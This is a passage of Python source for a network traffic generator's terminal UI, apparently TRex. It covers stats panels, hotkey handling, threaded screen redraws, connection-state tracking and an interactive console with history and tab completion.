    (TG) paging."""
    def __init__(self, mng):
        super(TrexTUIAstfTrafficStats, self).__init__(mng, "astats")
        self.start_row = 0  # scroll offset: first visible line of the stats output
        self.max_lines = TrexTUI.MIN_ROWS - 16 # 16 is size of panels below and above
        self.num_lines = 0  # number of lines in the last rendered stats output
        self.tgid = 0       # current template group id (0 = all groups)
        self.key_actions = OrderedDict()
        # 'clear' is only offered when viewing all TGs (tgid == 0)
        self.key_actions['c'] = {'action': self.action_clear, 'legend': 'clear', 'show': Predicate(lambda : self.tgid == 0)}
        self.key_actions['Up'] = {'action': self.action_up, 'legend': 'scroll up', 'show': True}
        self.key_actions['Down'] = {'action': self.action_down, 'legend': 'scroll down', 'show': True}
        self.key_actions['Left'] = {'action': self.action_left, 'legend': 'previous TG', 'show': True}
        self.key_actions['Right'] = {'action': self.action_right, 'legend': 'next TG', 'show': True}
    def show(self, buffer):
        """Render global stats, then a scrollable window of the traffic stats."""
        self.client._show_global_stats(buffer = buffer)
        # render into a temporary buffer so we can window (scroll) the output
        buf = StringIO()
        try:
            self.client._show_traffic_stats(False, buffer = buf, tgid = self.tgid)
        except ASTFErrorBadTG:
            # the selected TG no longer exists - fall back to all groups
            self.tgid = 0
            self.client._show_traffic_stats(False, buffer = buf, tgid = self.tgid)
        buf.seek(0)
        out_lines = buf.readlines()
        self.num_lines = len(out_lines)
        # emit only the currently visible window of lines
        buffer.write(''.join(out_lines[self.start_row:self.start_row+self.max_lines]))
        buffer.write('\n')
    def get_key_actions(self):
        return self.key_actions
    def action_clear(self):
        self.client.clear_traffic_stats()
        return ""
    def action_up(self):
        # clamp first, in case the output shrank below the current offset
        if self.start_row > self.num_lines:
            self.start_row = self.num_lines
        elif self.start_row > 0:
            self.start_row -= 1
    def action_down(self):
        # scroll down only while more lines remain below the window
        if self.start_row < self.num_lines - self.max_lines:
            self.start_row += 1
    def action_left(self):
        # previous template group (stop at 0 = all)
        if self.tgid > 0:
            self.tgid -= 1
    def action_right(self):
        # next template group (bounded by the server's TG count)
        if self.tgid < self.client._get_num_of_tgids():
            self.tgid += 1
# ASTF latency stats
class TrexTUIAstfLatencyStats(TrexTUIPanel):
    """ASTF latency panel cycling between several latency views."""

    def __init__(self, mng):
        super(TrexTUIAstfLatencyStats, self).__init__(mng, 'lstats')
        self.key_actions = OrderedDict()
        # the legend is a callable so it always names the NEXT view
        self.key_actions['v'] = {'action': self.action_toggle_view, 'legend': self.get_next_view, 'show': True}
        self.views = [
            {'name': 'main latency', 'func': self.client._show_latency_stats},
            {'name': 'histogram', 'func': self.client._show_latency_histogram},
            {'name': 'counters', 'func': self.client._show_latency_counters},
        ]
        self.view_index = 0         # view currently rendered
        self.next_view_index = 1    # view 'v' switches to

    def get_next_view(self):
        """Legend text describing the view the 'v' key would switch to."""
        return "view toggle to '%s'" % self.views[self.next_view_index]['name']

    def show(self, buffer):
        self.client._show_global_stats(buffer = buffer)
        self.views[self.view_index]['func'](buffer = buffer)

    def get_key_actions(self):
        return self.key_actions

    def action_toggle_view(self):
        """Advance to the next view, wrapping around the list."""
        self.view_index = self.next_view_index
        self.next_view_index = (self.next_view_index + 1) % len(self.views)
        return ""
# utilization stats
class TrexTUIUtilizationStats(TrexTUIPanel):
    """Panel showing CPU and mbuf utilization alongside the global stats."""

    def __init__(self, mng):
        super(TrexTUIUtilizationStats, self).__init__(mng, "ustats")
        self.key_actions = {}   # this panel has no hotkeys of its own

    def show(self, buffer):
        self.client._show_global_stats(buffer = buffer)
        self.client._show_cpu_util(buffer = buffer)
        self.client._show_mbuf_util(buffer = buffer)

    def get_key_actions(self):
        return self.key_actions
# log
class TrexTUILog():
    """In-memory event log rendered at the bottom of the TUI."""

    def __init__(self):
        self.log = []

    def add_event(self, msg):
        """Append *msg* to the log, stamped with the current wall-clock time."""
        timestamp = str(datetime.datetime.now().time())
        self.log.append("[{0}] {1}".format(timestamp, msg))

    def show(self, buffer, max_lines = 4):
        """Print a 'Log:' header plus the most recent *max_lines* entries."""
        start = max(len(self.log) - max_lines, 0)
        print(format_text("\nLog:", 'bold', 'underline'), file = buffer)
        for entry in self.log[start:]:
            print(entry, file = buffer)
# a predicate to wrap function as a bool
class Predicate(object):
    """Wraps a zero-argument callable so it can be evaluated as a boolean."""

    def __init__(self, func):
        self.func = func

    # Python 2 truth protocol
    def __nonzero__(self):
        return bool(self.func())

    # Python 3 truth protocol
    def __bool__(self):
        return bool(self.func())
# Panels manager (contains server panels)
class TrexTUIPanelManager():
    """Owns all panels, the global hotkeys, the legend and the event log;
    routes keystrokes either to itself or to the currently active panel."""
    def __init__ (self, tui):
        self.tui = tui
        self.client = tui.client
        self.ports = self.client.get_all_ports()
        self.locked = False
        self.panels = {}
        self.panels['dashboard'] = TrexTUIDashBoard(self)
        self.panels['ustats'] = TrexTUIUtilizationStats(self)
        # global hotkeys; 'show' may be a bool or a Predicate evaluated lazily
        self.key_actions = OrderedDict()
        # we allow console only when ports are acquired
        self.key_actions['ESC'] = {'action': self.action_none, 'legend': 'console', 'show': Predicate(lambda : not self.locked)}
        self.key_actions['q'] = {'action': self.action_none, 'legend': 'quit', 'show': True}
        self.key_actions['d'] = {'action': self.action_show_dash, 'legend': 'dashboard', 'show': True}
        self.key_actions['u'] = {'action': self.action_show_ustats, 'legend': 'util', 'show': True}
        # HACK - FIX THIS
        # stateless specific panels
        if self.client.get_mode() == "STL":
            self.panels['sstats'] = TrexTUIStreamsStats(self)
            self.panels['lstats'] = TrexTUILatencyStats(self)
            self.key_actions['s'] = {'action': self.action_show_sstats, 'legend': 'streams', 'show': True}
            self.key_actions['l'] = {'action': self.action_show_lstats, 'legend': 'latency', 'show': True}
        elif self.client.get_mode() == "ASTF":
            self.panels['astats'] = TrexTUIAstfTrafficStats(self)
            self.panels['lstats'] = TrexTUIAstfLatencyStats(self)
            self.key_actions['t'] = {'action': self.action_show_astats, 'legend': 'astf', 'show': True}
            self.key_actions['l'] = {'action': self.action_show_lstats, 'legend': 'latency', 'show': True}
        # start with dashboard
        self.main_panel = self.panels['dashboard']
        # log object
        self.log = TrexTUILog()
        self.generate_legend()
        # spinner while connected, blinking X while disconnected
        self.conn_bar = SimpleBar('status: ', ['|','/','-','\\'])
        self.dis_bar = SimpleBar('status: ', ['X', ' '])
        self.show_log = False
    def generate_legend(self):
        """Rebuild the legend: one line of global hotkeys, one for the panel."""
        self.legend = "\n{:<12}".format("browse:")
        for k, v in self.key_actions.items():
            if v['show']:
                # 'legend' may be a plain string or a callable producing one
                try:
                    legend = v['legend']()
                except TypeError:
                    legend = v['legend']
                x = "'{0}' - {1}, ".format(k, legend)
                if v.get('color'):
                    self.legend += "{:}".format(format_text(x, v.get('color')))
                else:
                    self.legend += "{:}".format(x)
        self.legend += "\n{:<12}".format(self.main_panel.get_name() + ":")
        for k, v in self.main_panel.get_key_actions().items():
            if v['show']:
                try:
                    legend = v['legend']()
                except TypeError:
                    legend = v['legend']
                x = "'{0}' - {1}, ".format(k, legend)
                if v.get('color'):
                    self.legend += "{:}".format(format_text(x, v.get('color')))
                else:
                    self.legend += "{:}".format(x)
    def print_connection_status (self, buffer):
        # animated spinner when active, blinking X otherwise
        if self.tui.get_state() == self.tui.STATE_ACTIVE:
            self.conn_bar.show(buffer = buffer)
        else:
            self.dis_bar.show(buffer = buffer)
    def print_legend (self, buffer):
        print(format_text(self.legend, 'bold'), file = buffer)
    # on window switch or turn on / off of the TUI we call this
    def init (self, show_log = False, locked = False):
        self.show_log = show_log
        self.locked = locked
        self.generate_legend()
    def show (self, show_legend, buffer):
        """Render the active panel, connection status, legend and log."""
        try:
            self.main_panel.show(buffer)
        except:
            # a panel may fail transiently while disconnected; only re-raise
            # when we are actually connected
            if self.client.is_connected():
                raise
        self.print_connection_status(buffer)
        if show_legend:
            self.generate_legend()
            self.print_legend(buffer)
        if self.show_log:
            self.log.show(buffer)
    def handle_key (self, ch):
        """Dispatch a keystroke; returns True when the key was consumed."""
        # check for the manager registered actions
        if ch in self.key_actions:
            msg = self.key_actions[ch]['action']()
        # check for main panel actions
        elif ch in self.main_panel.get_key_actions():
            msg = self.main_panel.get_key_actions()[ch]['action']()
        else:
            return False
        self.generate_legend()
        return True
        #if msg == None:
        #    return False
        #else:
        #    if msg:
        #        self.log.add_event(msg)
        #    return True
    # actions
    def action_none (self):
        return None
    def action_show_dash (self):
        self.main_panel = self.panels['dashboard']
        self.init(self.show_log)
        return ""
    def action_show_port (self, port_id):
        # returns a closure switching to the per-port panel
        def action_show_port_x ():
            self.main_panel = self.panels['port {0}'.format(port_id)]
            self.init()
            return ""
        return action_show_port_x
    def action_show_sstats (self):
        self.main_panel = self.panels['sstats']
        self.init(self.show_log)
        return ""
    def action_show_astats (self):
        self.main_panel = self.panels['astats']
        self.init(self.show_log)
        return ""
    def action_show_lstats (self):
        self.main_panel = self.panels['lstats']
        self.init(self.show_log)
        return ""
    def action_show_ustats(self):
        self.main_panel = self.panels['ustats']
        self.init(self.show_log)
        return ""
# ScreenBuffer is a class designed to
# avoid inline delays when reprinting the screen
class ScreenBuffer():
    """Renders screens on a background thread so the UI loop never blocks.

    The owner calls update() to request a redraw; the worker thread invokes
    redraw_cb(buffer) and publishes the filled buffer as a snapshot, which
    the owner then fetches (once) with get().
    """

    def __init__ (self, redraw_cb):
        self.snapshot = ''              # last rendered screen ('' / None = nothing new)
        self.lock = threading.Lock()    # protects self.snapshot
        self.redraw_cb = redraw_cb      # callback: redraw_cb(buffer) renders a frame
        self.update_flag = False        # set when a redraw has been requested

    def start (self):
        self.active = True
        # daemon thread so it never keeps the process alive on exit;
        # (fix: Thread.setDaemon() is deprecated - use the daemon kwarg)
        self.t = threading.Thread(target = self.__handler, daemon = True)
        self.t.start()

    def stop (self):
        self.active = False
        self.t.join()

    # request an update
    def update (self):
        self.update_flag = True

    # fetch the screen, return None if no new screen exists yet
    def get (self):
        if not self.snapshot:
            return None

        # we have a snapshot - fetch it (and clear it, so it is returned once)
        with self.lock:
            x = self.snapshot
            self.snapshot = None

        return x

    def __handler (self):
        # worker loop: redraw whenever a request is pending
        while self.active:
            if self.update_flag:
                self.__redraw()
            time.sleep(0.01)

    # redraw the next screen
    def __redraw (self):
        buffer = StringIO()
        self.redraw_cb(buffer)

        # atomically publish the new snapshot and clear the request flag
        with self.lock:
            self.snapshot = buffer
            self.update_flag = False
# a policer class to make sure no too-fast redraws
# occurs - it filters fast bursts of redraws
class RedrawPolicer():
    """Rate-limits redraw requests: a marked redraw becomes due only after
    'rate' seconds since the last reset, unless it was forced."""

    def __init__(self, rate):
        self.ts = 0             # timestamp of the last reset
        self.marked = False     # a redraw has been requested
        self.rate = rate        # minimal interval between redraws (seconds)
        self.force = False      # bypass the rate limit once

    def mark_for_redraw(self, force = False):
        self.marked = True
        self.force = self.force or force

    def should_redraw(self):
        if self.force:
            return True
        elapsed = time.time() - self.ts
        return self.marked and (elapsed > self.rate)

    def reset(self, restart = False):
        self.ts = time.time()
        self.marked = restart
        self.force = False
# shows a textual top style window
class TrexTUI():
    """Top-level textual UI ('top'-style window): owns the panel manager, the
    background screen buffer and the main draw / keyboard / reconnect loop."""
    # connection state-machine states
    STATE_ACTIVE = 0
    STATE_LOST_CONT = 1
    STATE_RECONNECT = 2
    is_graph = False
    # number of live TUI instances (see has_instance)
    _ref_cnt = 0
    # minimal terminal dimensions required to render the TUI
    MIN_ROWS = 45
    MIN_COLS = 111
    class ScreenSizeException(Exception):
        # raised when the terminal is smaller than MIN_COLS x MIN_ROWS
        def __init__ (self, cols, rows):
            msg = "TUI requires console screen size of at least {0}x{1}, current is {2}x{3}".format(TrexTUI.MIN_COLS,
                                                                                                    TrexTUI.MIN_ROWS,
                                                                                                    cols,
                                                                                                    rows)
            super(TrexTUI.ScreenSizeException, self).__init__(msg)
    def __init__ (self, console):
        self.console = console
        self.client = console.client
        # serializes TUI rendering against console commands
        self.tui_global_lock = threading.Lock()
        self.pm = TrexTUIPanelManager(self)
        self.sb = ScreenBuffer(self.redraw_handler)
        TrexTUI._ref_cnt += 1
    def __del__(self):
        TrexTUI._ref_cnt -= 1
    @classmethod
    def has_instance(cls):
        # True when at least one TUI instance is alive
        return cls._ref_cnt > 0
    def redraw_handler (self, buffer):
        # this is executed by the screen buffer - should be protected against TUI commands
        with self.tui_global_lock:
            self.pm.show(show_legend = self.async_keys.is_legend_mode(), buffer = buffer)
    def clear_screen (self, lines = 50):
        """Clear *lines* terminal lines using ANSI escapes and home the cursor."""
        # reposition the cursor
        sys.stdout.write("\x1b[0;0H")
        # clear all lines
        for i in range(lines):
            sys.stdout.write("\x1b[0K")
            if i < (lines - 1):
                sys.stdout.write("\n")
        # reposition the cursor
        sys.stdout.write("\x1b[0;0H")
    def show (self, client, save_console_history, show_log = False, locked = False):
        """Entry point: validate terminal size, grab the keyboard, run the loop."""
        rows, cols = os.popen('stty size', 'r').read().split()
        if (int(rows) < TrexTUI.MIN_ROWS) or (int(cols) < TrexTUI.MIN_COLS):
            raise self.ScreenSizeException(rows = rows, cols = cols)
        with AsyncKeys(client, self.console, save_console_history, self.tui_global_lock, locked) as async_keys:
            sys.stdout.write("\x1bc")   # full terminal reset
            self.async_keys = async_keys
            self.show_internal(show_log, locked)
    def show_internal (self, show_log, locked):
        """Main loop: poll keys, redraw, and drive the reconnect state machine."""
        self.pm.init(show_log, locked)
        self.state = self.STATE_ACTIVE
        # create print policers
        self.full_redraw = RedrawPolicer(0.5)
        self.keys_redraw = RedrawPolicer(0.05)
        self.full_redraw.mark_for_redraw()
        try:
            self.sb.start()
            while True:
                # draw and handle user input
                status = self.async_keys.tick(self.pm)
                # prepare the next frame
                self.prepare(status)
                time.sleep(0.01)
                self.draw_screen()
                with self.tui_global_lock:
                    self.handle_state_machine()
        except TUIQuit:
            print("\nExiting TUI...")
        except KeyboardInterrupt:
            print("\nExiting TUI...")
        finally:
            self.sb.stop()
        print("")
    # handle state machine
    def handle_state_machine (self):
        # regular state
        if self.state == self.STATE_ACTIVE:
            # if no connectivity - move to lost connecitivty
            if not self.client.is_connected():
                self.state = self.STATE_LOST_CONT
        # lost connectivity
        elif self.state == self.STATE_LOST_CONT:
            # if the connection is alive (some data is arriving on the async channel)
            # try to reconnect
            if self.client.conn.is_alive():
                # move to state reconnect
                self.state = self.STATE_RECONNECT
        # restored connectivity - try to reconnect
        elif self.state == self.STATE_RECONNECT:
            try:
                self.client.connect()
                self.client.acquire()
                self.state = self.STATE_ACTIVE
            except TRexError:
                # reconnect failed - back to waiting
                self.state = self.STATE_LOST_CONT
    # logic before printing
    def prepare (self, status):
        # translate the key handler's status into redraw requests
        if status == AsyncKeys.STATUS_REDRAW_ALL:
            self.full_redraw.mark_for_redraw(force = True)
        elif status == AsyncKeys.STATUS_REDRAW_KEYS:
            self.keys_redraw.mark_for_redraw()
        if self.full_redraw.should_redraw():
            self.sb.update()
            self.full_redraw.reset(restart = True)
        return
    # draw once
    def draw_screen (self):
        # check for screen buffer's new screen
        x = self.sb.get()
        # we have a new screen to draw
        if x:
            self.clear_screen()
            self.async_keys.draw(x)
            sys.stdout.write(x.getvalue())
            sys.stdout.flush()
        # maybe we need to redraw the keys
        elif self.keys_redraw.should_redraw():
            # move up 4 lines to overwrite the key/prompt area only
            sys.stdout.write("\x1b[4A")
            self.async_keys.draw(sys.stdout)
            sys.stdout.flush()
            # reset the policer for next time
            self.keys_redraw.reset()
    def get_state (self):
        return self.state
class TokenParser(object):
    """Splits a raw stdin character sequence into input tokens.

    Regular characters become single-char tokens; an ESC ('\\x1b') greedily
    consumes the rest of the buffer so an escape sequence arrives as one token.
    """

    def __init__ (self, seq):
        self.buffer = list(seq)

    def pop (self):
        """Consume and return the next character."""
        return self.buffer.pop(0)

    def peek (self):
        """Return the next character without consuming it, or None when empty."""
        if not self.buffer:
            return None
        return self.buffer[0]

    def next_token (self):
        """Consume and return the next token, or None when the buffer is empty."""
        if not self.peek():
            return None

        token = self.pop()

        # special chars - an escape sequence swallows the remaining buffer
        if token == '\x1b':
            while self.peek():
                token += self.pop()

        return token

    def parse (self):
        """Return the list of all tokens in the buffer."""
        tokens = []
        while True:
            token = self.next_token()
            # idiom fix: compare to None with 'is', not '=='
            if token is None:
                break
            tokens.append(token)

        return tokens
# handles async IO
class AsyncKeys:
    """Owns the terminal in raw (non-canonical, no-echo) mode and dispatches
    keystrokes to the active engine: legend navigation or interactive console."""

    MODE_LEGEND  = 1
    MODE_CONSOLE = 2

    STATUS_NONE        = 0
    STATUS_REDRAW_KEYS = 1
    STATUS_REDRAW_ALL  = 2

    def __init__ (self, client, console, save_console_history, tui_global_lock, locked = False):
        self.tui_global_lock = tui_global_lock

        self.engine_console = AsyncKeysEngineConsole(self, console, client, save_console_history)
        self.engine_legend  = AsyncKeysEngineLegend(self)

        # when locked, the console is unavailable - start in legend mode
        # (fix: 'self.locked' used to be assigned redundantly in each branch)
        self.locked = locked
        self.engine = self.engine_legend if locked else self.engine_console

    def __enter__ (self):
        # init termios - no echo, non-canonical, non-blocking reads
        self.old_settings = termios.tcgetattr(sys.stdin)
        new_settings = termios.tcgetattr(sys.stdin)
        new_settings[3] = new_settings[3] & ~(termios.ECHO | termios.ICANON) # lflags
        new_settings[6][termios.VMIN] = 0  # cc
        new_settings[6][termios.VTIME] = 0 # cc

        # huge buffer - no print without flush
        sys.stdout = open('/dev/stdout', 'w', TrexTUI.MIN_COLS * TrexTUI.MIN_COLS * 2)

        termios.tcsetattr(sys.stdin, termios.TCSADRAIN, new_settings)

        return self

    def __exit__ (self, type, value, traceback):
        termios.tcsetattr(sys.stdin, termios.TCSADRAIN, self.old_settings)

        # restore sys.stdout
        sys.stdout.close()
        sys.stdout = sys.__stdout__

    def is_legend_mode (self):
        return self.engine.get_type() == AsyncKeys.MODE_LEGEND

    def is_console_mode (self):
        # bug fix: 'get_type' was compared without being called, so this
        # method always returned False
        return self.engine.get_type() == AsyncKeys.MODE_CONSOLE

    def switch (self):
        # toggle between the legend and the console engines
        if self.is_legend_mode():
            self.engine = self.engine_console
        else:
            self.engine = self.engine_legend

    def handle_token (self, token, pm):
        """Handle a single input token; returns a STATUS_* redraw hint."""
        # ESC for switch
        if token == '\x1b':
            if not self.locked:
                self.switch()
            return self.STATUS_REDRAW_ALL

        # EOF (ctrl + D)
        if token == '\x04':
            raise TUIQuit()

        # pass tick to engine
        return self.engine.tick(token, pm)

    def tick (self, pm):
        """Read pending stdin input and dispatch every token in it.

        Returns the strongest STATUS_* redraw hint produced by the tokens.
        """
        rc = self.STATUS_NONE

        # fetch the stdin buffer
        seq = os.read(sys.stdin.fileno(), 1024).decode('ascii', errors = 'ignore')
        if not seq:
            return self.STATUS_NONE

        # parse all the tokens from the buffer
        tokens = TokenParser(seq).parse()

        # process them; an engine may return None - treat it as STATUS_NONE
        # (bug fix: max(rc, None) raised TypeError on Python 3)
        for token in tokens:
            token_rc = self.handle_token(token, pm)
            if token_rc is not None:
                rc = max(rc, token_rc)

        return rc

    def draw (self, buffer):
        self.engine.draw(buffer)
# Legend engine
class AsyncKeysEngineLegend:
    """Navigation engine: forwards single keys and arrow escape sequences to
    the panel manager."""

    # fix: the parameter was named 'async', which is a reserved keyword
    # since Python 3.7 and made this class a syntax error
    def __init__ (self, async_):
        self.async_ = async_

    def get_type (self):
        return self.async_.MODE_LEGEND

    def tick (self, seq, pm):
        if seq == 'q':
            raise TUIQuit()

        # multi-char sequences are arrow-key escape codes
        if len(seq) > 1:
            if seq == '\x1b\x5b\x41':   # scroll up
                pm.handle_key('Up')
            if seq == '\x1b\x5b\x42':   # scroll down
                pm.handle_key('Down')
            if seq == '\x1b\x5b\x43':   # scroll right
                pm.handle_key('Right')
            if seq == '\x1b\x5b\x44':   # scroll left
                pm.handle_key('Left')
            return AsyncKeys.STATUS_NONE

        rc = pm.handle_key(seq)
        return AsyncKeys.STATUS_REDRAW_ALL if rc else AsyncKeys.STATUS_NONE

    def draw (self, buffer):
        # the legend engine draws nothing of its own
        pass
# console engine
class AsyncKeysEngineConsole:
    """Interactive console engine: a mini readline with history navigation,
    tab completion for command names and file paths, and command execution."""

    # fix: the first parameter was named 'async', which is a reserved keyword
    # since Python 3.7 and made this class a syntax error
    def __init__ (self, async_, console, client, save_console_history):
        self.async_ = async_
        self.lines = deque(maxlen = 100)    # editable history, newest first

        self.generate_prompt = console.generate_prompt
        self.save_console_history = save_console_history

        # console methods exported by the client, plus local commands
        self.ac = client.get_console_methods()
        self.ac.update({'quit' : self.action_quit,
                        'q'    : self.action_quit,
                        'exit' : self.action_quit,
                        'help' : self.action_help,
                        '?'    : self.action_help})

        # fetch readline history and add relevants
        for i in range(1, readline.get_current_history_length()):
            cmd = readline.get_history_item(i)
            if cmd.strip() and cmd.split()[0] in self.ac:
                self.lines.appendleft(CmdLine(cmd))

        # new line
        self.lines.appendleft(CmdLine(''))
        self.line_index = 0         # history line currently being edited
        self.last_status = ''       # status text shown under the prompt

    def action_quit (self, _):
        raise TUIQuit()

    def action_help (self, _):
        return ' '.join([format_text(cmd, 'bold') for cmd in self.ac.keys()])

    def get_type (self):
        return self.async_.MODE_CONSOLE

    def handle_escape_char (self, seq):
        """Handle a multi-char escape sequence (arrows, home/end, word ops).

        Returns STATUS_REDRAW_KEYS for handled keys, STATUS_NONE otherwise.
        """
        # up - older history entry
        if seq == '\x1b[A':
            self.line_index = min(self.line_index + 1, len(self.lines) - 1)

        # down - newer history entry
        elif seq == '\x1b[B':
            self.line_index = max(self.line_index - 1, 0)

        # left
        elif seq == '\x1b[D':
            self.lines[self.line_index].go_left()

        # right
        elif seq == '\x1b[C':
            self.lines[self.line_index].go_right()

        # del
        elif seq == '\x1b[3~':
            self.lines[self.line_index].del_key()

        # home
        elif seq in ('\x1b[H', '\x1b\x4fH'):
            self.lines[self.line_index].home_key()

        # end
        elif seq in ('\x1b[F', '\x1b\x4fF'):
            self.lines[self.line_index].end_key()

        # Alt + Backspace - delete the word left of the cursor
        elif seq == '\x1b\x7f':
            pos = orig_pos = self.lines[self.line_index].cursor_index
            cut_to_pos = None
            line = self.lines[self.line_index].get()
            # scan left for the start of the current word
            while pos >= 1:
                if pos == 1:
                    cut_to_pos = 0
                elif line[pos - 1] != ' ' and line[pos - 2] == ' ':
                    cut_to_pos = pos - 1
                    break
                pos -= 1
            if cut_to_pos is not None:
                self.lines[self.line_index].set(line[:cut_to_pos] + line[orig_pos:], cut_to_pos)

        # Alt + Left or Ctrl + Left - jump one word left
        elif seq in ('\x1b[\x31\x3B\x33\x44', '\x1b[\x31\x3B\x35\x44'):
            pos = self.lines[self.line_index].cursor_index
            move_to_pos = None
            line = self.lines[self.line_index].get()
            while pos >= 1:
                if pos == 1:
                    move_to_pos = 0
                elif line[pos - 1] != ' ' and line[pos - 2] == ' ':
                    move_to_pos = pos - 1
                    break
                pos -= 1
            if move_to_pos is not None:
                self.lines[self.line_index].cursor_index = move_to_pos

        # Alt + Right or Ctrl + Right - jump one word right
        elif seq in ('\x1b[\x31\x3B\x33\x43', '\x1b[\x31\x3B\x35\x43'):
            pos = self.lines[self.line_index].cursor_index
            move_to_pos = None
            line = self.lines[self.line_index].get()
            while pos <= len(line) - 1:
                if pos == len(line) - 1:
                    move_to_pos = len(line)
                elif line[pos] != ' ' and line[pos + 1] == ' ':
                    move_to_pos = pos + 1
                    break
                pos += 1
            if move_to_pos is not None:
                self.lines[self.line_index].cursor_index = move_to_pos

        # PageUp - search older history entries matching the current prefix
        elif seq == '\x1b\x5b\x35\x7e':
            line_part = self.lines[self.line_index].get()[:self.lines[self.line_index].cursor_index]
            index = self.line_index
            while index < len(self.lines) - 1:
                index += 1
                if self.lines[index].get().startswith(line_part):
                    self.lines[index].cursor_index = self.lines[self.line_index].cursor_index
                    self.line_index = index
                    break

        # PageDown - search newer history entries matching the current prefix
        elif seq == '\x1b\x5b\x36\x7e':
            line_part = self.lines[self.line_index].get()[:self.lines[self.line_index].cursor_index]
            index = self.line_index
            while index > 0:
                index -= 1
                if self.lines[index].get().startswith(line_part):
                    self.lines[index].cursor_index = self.lines[self.line_index].cursor_index
                    self.line_index = index
                    break

        # unknown key
        else:
            return AsyncKeys.STATUS_NONE

        return AsyncKeys.STATUS_REDRAW_KEYS

    def tick (self, seq, _):
        # handle escape chars
        if len(seq) > 1:
            return self.handle_escape_char(seq)

        # handle each char
        for ch in seq:
            return self.handle_single_key(ch)

    def handle_single_key (self, ch):
        """Handle one regular keystroke; returns a STATUS_* redraw hint."""
        # newline - execute the current line
        if ch == '\n':
            self.handle_cmd()

        # backspace
        elif ch == '\x7f':
            self.lines[self.line_index].backspace()

        # TAB - completion
        elif ch == '\t':
            tokens = self.lines[self.line_index].get().split()
            if not tokens:
                # nothing to complete - no redraw needed
                # (bug fix: used to return None, which broke max() in the caller)
                return AsyncKeys.STATUS_NONE
            if len(tokens) == 1:
                self.handle_tab_names(tokens[0])
            else:
                self.handle_tab_files(tokens)

        # simple char - insert at the cursor
        else:
            self.lines[self.line_index] += ch

        return AsyncKeys.STATUS_REDRAW_KEYS

    # handle TAB key for completing function names
    def handle_tab_names (self, cur):
        matching_cmds = [x for x in self.ac if x.startswith(cur)]

        common = os.path.commonprefix([x for x in self.ac if x.startswith(cur)])
        if common:
            if len(matching_cmds) == 1:
                # unique match - complete it and add a trailing space
                self.lines[self.line_index].set(common + ' ')
                self.last_status = ''
            else:
                # complete up to the common prefix and list the candidates
                # (fix: message typo 'ambigious' -> 'ambiguous')
                self.lines[self.line_index].set(common)
                self.last_status = 'ambiguous: '+ ' '.join([format_text(cmd, 'bold') for cmd in matching_cmds])

    # handle TAB for completing filenames
    def handle_tab_files (self, tokens):

        # only commands with files
        if tokens[0] not in {'start', 'push'}:
            return

        # '-f' with no parameters - no partial and use current dir
        if tokens[-1] == '-f':
            partial = ''
            d = '.'

        # got a partial path
        elif tokens[-2] == '-f':
            partial = tokens.pop()

            # check for dirs
            dirname, basename = os.path.dirname(partial), os.path.basename(partial)
            if os.path.isdir(dirname):
                d = dirname
                partial = basename
            else:
                d = '.'
        else:
            return

        # fetch all dirs and files matching wildcard
        files = []
        for x in os.listdir(d):
            if os.path.isdir(os.path.join(d, x)):
                files.append(x + '/')
            elif x.endswith( ('.py', 'yaml', 'pcap', 'cap', 'erf') ):
                files.append(x)

        # dir might not have the files
        # (fix: message typo 'loadble' -> 'loadable')
        if not files:
            self.last_status = format_text('no loadable files under path', 'bold')
            return

        # find all the matching files
        matching_files = [x for x in files if x.startswith(partial)] if partial else files

        # do we have a longer common than partial ?
        common = os.path.commonprefix([x for x in files if x.startswith(partial)])
        if not common:
            common = partial

        # fix: 'is not' was used for string comparison - use '!=' (identity
        # comparison with a literal is undefined behavior / SyntaxWarning)
        tokens.append(os.path.join(d, common) if d != '.' else common)

        # reforge the line
        newline = ' '.join(tokens)

        if len(matching_files) == 1:
            if os.path.isfile(tokens[-1]):
                newline += ' '

            self.lines[self.line_index].set(newline)
            self.last_status = ''
        else:
            self.lines[self.line_index].set(newline)
            self.last_status = ' '.join([format_text(f, 'bold') for f in matching_files[:5]])
            if len(matching_files) > 5:
                self.last_status += ' ... [{0} more matches]'.format(len(matching_files) - 5)

    def split_cmd (self, cmd):
        """Split a command line into (op, param-string)."""
        s = cmd.split(' ', 1)
        op = s[0]
        param = s[1] if len(s) == 2 else ''
        return op, param

    def handle_cmd (self):
        """Execute the current line, update history and the status line."""
        cmd = self.lines[self.line_index].get().strip()
        if not cmd:
            return

        op, param = self.split_cmd(cmd)

        func = self.ac.get(op)
        if func:
            with self.async_.tui_global_lock:
                func_rc = func(param)

        # take out the empty line
        empty_line = self.lines.popleft()
        assert(empty_line.ro_line == '')

        # avoid duplicating the most recent history entry
        if not self.lines or self.lines[0].ro_line != cmd:
            self.lines.appendleft(CmdLine(cmd))

        # back in
        self.lines.appendleft(empty_line)
        self.line_index = 0
        readline.add_history(cmd)
        self.save_console_history()

        # back to readonly
        for line in self.lines:
            line.invalidate()

        assert(self.lines[0].modified == False)
        color = None
        if not func:
            self.last_status = "unknown command: '{0}'".format(format_text(cmd.split()[0], 'bold'))
        else:
            # internal commands
            if isinstance(func_rc, str):
                self.last_status = func_rc

            # RC response
            else:
                # success
                if func_rc is None:
                    self.last_status = format_text("[OK]", 'green')

                # errors
                else:
                    err_msgs = ascii_split(str(func_rc))
                    if not err_msgs:
                        err_msgs = ['Unknown error']

                    self.last_status = format_text(clear_formatting(err_msgs[0]), 'red')
                    if len(err_msgs) > 1:
                        self.last_status += " [{0} more errors messages]".format(len(err_msgs) - 1)
                    color = 'red'

        # trim too long lines
        if ansi_len(self.last_status) > TrexTUI.MIN_COLS:
            self.last_status = format_text(self.last_status[:TrexTUI.MIN_COLS] + "...", color, 'bold')

    def draw (self, buffer):
        """Draw the help hint, the status line and the editable prompt."""
        buffer.write("\nPress 'ESC' for navigation panel...\n")
        buffer.write("status: \x1b[0K{0}\n".format(self.last_status))
        buffer.write("\n{0}\x1b[0K".format(self.generate_prompt(prefix = 'tui')))
        self.lines[self.line_index].draw(buffer)
# a readline alike command line - can be modified during edit
class CmdLine(object):
    """A readline-like editable command line.

    Holds a pristine history line (ro_line); the first edit copies it into a
    working line (w_line) so the stored history stays intact until committed.
    """

    def __init__(self, line):
        self.ro_line = line             # pristine history text
        self.w_line = None              # edited copy, valid only when modified
        self.modified = False
        self.cursor_index = len(line)

    def get(self):
        """Return the effective text: the edited copy if present, else the original."""
        return self.w_line if self.modified else self.ro_line

    def set(self, line, cursor_pos = None):
        """Replace the working text; cursor goes to the end unless given."""
        self.w_line = line
        self.modified = True
        self.cursor_index = len(line) if cursor_pos is None else cursor_pos

    def __add__(self, other):
        # only in-place append (+=) is supported
        assert(0)

    def __str__(self):
        return self.get()

